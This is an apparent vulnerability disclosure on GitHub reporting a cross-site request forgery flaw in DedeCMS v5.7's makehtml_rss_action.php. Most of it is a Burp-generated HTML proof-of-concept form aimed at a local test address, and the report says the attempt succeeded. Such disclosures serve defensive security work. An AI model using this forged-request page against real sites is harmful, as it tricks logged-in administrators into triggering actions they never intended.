Skip to content

Latest commit

 

History

History
33 lines (20 loc) · 827 Bytes

14.md

File metadata and controls

33 lines (20 loc) · 827 Bytes

target:https://github.com/wdsunwq/DedeCMSv5 version: v5.7

DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/makehtml_rss_action.php 1

Poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/src/dede/makehtml_rss_action.php">
      <input type="hidden" name="maxrecord" value="50" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>





2

successed

3